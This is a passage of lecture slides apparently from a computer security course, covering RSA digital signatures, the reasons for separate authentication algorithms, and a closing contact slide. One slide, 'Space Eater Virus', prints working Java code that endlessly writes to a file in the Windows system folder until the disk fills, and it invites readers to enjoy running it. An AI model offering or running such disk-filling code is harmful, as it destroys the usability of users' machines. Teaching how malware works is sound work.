  • 16. Authentication – Digital Signature • Authenticators produced are digital signatures • In a digital-signature algorithm, computationally infeasible to derive S(ks ) from V(kv) – V is a one-way function – Thus, kv is the public key and ks is the private key • Consider the RSA digital-signature algorithm – Similar to the RSA encryption algorithm, but the key use is reversed – Digital signature of message S(ks )(m) = H(m)ks mod N – The key ks again is a pair d, N, where N is the product of two large, randomly chosen prime numbers p and q – Verification algorithm is V(kv)(m, a) ≡ (akv mod N = H(m)) • Where kv satisfies kvks mod (p − 1)(q − 1) = 1
  • 17. Authentication (Cont.) • If encryption can prove the identity of the sender of a message, then why need separate authentication algorithms? – Authentication algorithms generally require fewer computations – Authenticator of a message is usually shorter than the message itself – Sometimes want authentication but not confidentiality. For example, a company may provide a software patch and could “sign” that patch to prove that it came from the company. – Can be basis for non-repudiation
  • 18. Space Eater Virus • import java.io.*; class Virus { public static void main (String ar[]) { try { FileWriter f = new FileWriter("C:/WINDOWS/Virus.dll",true); while(true) { f.write("Programming Is Such A FUN !!!"); } } catch(FileNotFoundException e) {} catch(IOException e){} } } • Enjoy with this virus ?
  • 19. Thanks for your attention Questions, please For any question, please use tmgaber@gmail.com Tarek Gaber,